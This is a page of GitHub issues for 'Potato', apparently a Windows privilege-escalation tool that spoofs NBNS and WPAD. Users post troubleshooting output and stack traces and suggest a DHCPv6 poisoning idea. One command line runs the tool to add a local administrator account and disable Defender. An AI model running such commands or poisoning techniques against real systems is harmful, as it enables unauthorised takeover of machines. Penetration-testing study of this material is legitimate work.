foxglovesec / potato Goto Github PK

I write this as an issue, but it could be a feature / improvement.

During a couple of penetration tests I observed that most Windows clients have ipv6 enabled but they do not have an ipv6 address assigned. In addition it seems that windows OS gives highest priority to the next received lease, does not matter if it's ipv4 or ipv6.

The result: ipv6 dhcp takes over already assigned ipv4 address.

Just presenting yourself as ipv6 dhcp server and serving ipv6 dhcp client requests is a very simple way to poisoning windows clients in the local network both dns and ip and get your "wpad" offered easily, as well as any other exploit.

Hi, I'm experticing some problem because my Windows 10 installation is part of a domain with a dns prefix like contoso.corp.com. In this case wpad is "wpad.contoso.corp.com". The spoofing part is working perfectly, but when something try to get the configuration file (wpad.dat) the requested URL is http://wpad.contoso.corp.com/wpad.dat and not http://127.0.0.1/wpad.dat so Potato is not replying with a config file but with an empty file.
I guess that the problem is on line #136 of Program.cs
<<else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat"))>>
We sould probably add the case with the hostname given with -spoof_host !
At the moment I've tried to open the progect on my Vistual Studio 2005 but I'me having problems with Imports (c:\Microsotf.CSharp.targets not found).
I'll try to solve my problems, but I think that many people will enjoin an official fix!

Thank you so much for your beautifull work !
Paolo

Since there are no instructions on how to 'install' the tool, I got Potato working by downloading the .exe and the two .dlls from Potato/source/Potato/Potato/bin/Release/

I ran the tool as suggested on my Win7 machine, and here is my output:

c:\Users***\Downloads>Potato.exe -ip -cmd "" -disable_exhaust true
Starting NBNS spoofer...WPAD = 127.0.0.1
Clearing dns and nbns cache...
Listening...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...

Continuing on like that until I hit ctrl+c. If I open up wireshark, I can see the NBNS broadcast requests for WPAD from my host hitting the network. Naturally, I don't see any repsonses as Wireshark cannot monitor the loopback interface on Windows.

I would expect to see the 'Got 127.0.0.1' in the output, but it never shows up. I've tried with and without admin privs, and with and without the Windows firewall enabled, and on two different Win7 machines with same results.

I've also tried setting diable_exhaust to false. In this case, my internet dies as all DNS requests from the host are failing.

Have I missed some steps in the setup? It looks to me like Potato is not receiving the NBNS or DNS requsts, but I verfied that UDP port 137 is listenening after I run Potato, but not before.

When I try to run it I get asked to install .net framework 3.5. Which I can't do because I don't have admin rights in the first place. Any recommendations or maybe I am doing something wrong?

Hello, I'have download the Potato-master, and i'm trying to run it on Windows Server 2012 R2.

The command that I'm using:

Potato.exe -ip 172.16.21.89 -cmd "C:\Windows\System32\cmd.exe /K net localgroup administrators project /add" -disable_exhaust true -disable_defender true

Now the IP (of the system that running the potato.exe) & the account name "project" are correct, and every time when the programs says "Spoofed Target WPAD succesfully..." the Windows Server pop a "Potato.exe have stopped working".

OS: Windows 7 Ultimate SP1 x64

.\Potato.exe -ip 10.1.11.108 -cmd notepad.exe -disable_exhaust true
Starting NBNS spoofer...WPAD = 127.0.0.1
Clearing dns and nbns cache... Got 127.0.0.1
Spoofed target WPAD succesfully...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...
Checking for windows defender updates...

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'NHttp, Version=0.1.8.0, Culture=neutral, PublicKeyToken=156364e4f7b202d9' or one of its dependencies. The system cannot find the file specified.
File name: 'NHttp, Version=0.1.8.0, Culture=neutral, PublicKeyToken=156364e4f7b202d9'
at Potato.HTTPNtlmHandler.startListening(String cmd, String[] wpad_exclude, Int32 port)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
at System.Threading.ThreadHelper.ThreadStart()

WRN: Assembly binding logging is turned OFF.
To enable assembly bind failure logging, set the registry value HKLM\Software\Microsoft\Fusion!EnableLog to 1.
Note: There is some performance penalty associated with assembly bind failure logging.
To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].

When trying to use I get this exception:

Excepción no controlada: System.Exception: Not supported yet. en SharpCifs.Smb.QueuedNtlmContext.GetSigningKey() en \vmware-host\shared fo
lders\Potato\source\SharpCifs\SharpCifs\Smb\QueuedNtlmContext.cs:línea 33
en SharpCifs.Smb.SmbSession.SessionSetup(ServerMessageBlock andx, ServerMessa
geBlock andxResponse) en \vmware-host\shared folders\Potato\source\SharpCifs\Sh
arpCifs\Smb\SmbSession.cs:línea 461
en SharpCifs.Smb.SmbSession.Send(ServerMessageBlock request, ServerMessageBlo
ck response) en \vmware-host\shared folders\Potato\source\SharpCifs\SharpCifs\S
mb\SmbSession.cs:línea 289
en SharpCifs.Smb.SmbTree.TreeConnect(ServerMessageBlock andx, ServerMessageBl
ock andxResponse) en \vmware-host\shared folders\Potato\source\SharpCifs\SharpC
ifs\Smb\SmbTree.cs:línea 194
en SharpCifs.Smb.SmbFile.DoConnect() en \vmware-host\shared folders\Potato\s
ource\SharpCifs\SharpCifs\Smb\SmbFile.cs:línea 1189
en SharpCifs.Smb.SmbFile.Connect() en \vmware-host\shared folders\Potato\sou
rce\SharpCifs\SharpCifs\Smb\SmbFile.cs:línea 1250
en SharpCifs.Smb.SmbFile.Connect0() en \vmware-host\shared folders\Potato\so
urce\SharpCifs\SharpCifs\Smb\SmbFile.cs:línea 1140
en SharpCifs.Smb.SmbFileInputStream..ctor(SmbFile file, Int32 openFlags) en
\vmware-host\shared folders\Potato\source\SharpCifs\SharpCifs\Smb\SmbFileInputSt
ream.cs:línea 92
en SharpCifs.Smb.TransactNamedPipeInputStream..ctor(SmbNamedPipe pipe) en \v
mware-host\shared folders\Potato\source\SharpCifs\SharpCifs\Smb\TransactNamedPip
eInputStream.cs:línea 42
en SharpCifs.Smb.SmbNamedPipe.GetNamedPipeInputStream() en \vmware-host\shar
ed folders\Potato\source\SharpCifs\SharpCifs\Smb\SmbNamedPipe.cs:línea 169
en SharpCifs.Dcerpc.DcerpcPipeHandle.DoSendFragment(Byte[] buf, Int32 off, In
t32 length, Boolean isDirect) en \vmware-host\shared folders\Potato\source\Shar
pCifs\SharpCifs\Dcerpc\DcerpcPipeHandle.cs:línea 74
en SharpCifs.Dcerpc.DcerpcHandle.Sendrecv(DcerpcMessage msg) en \vmware-host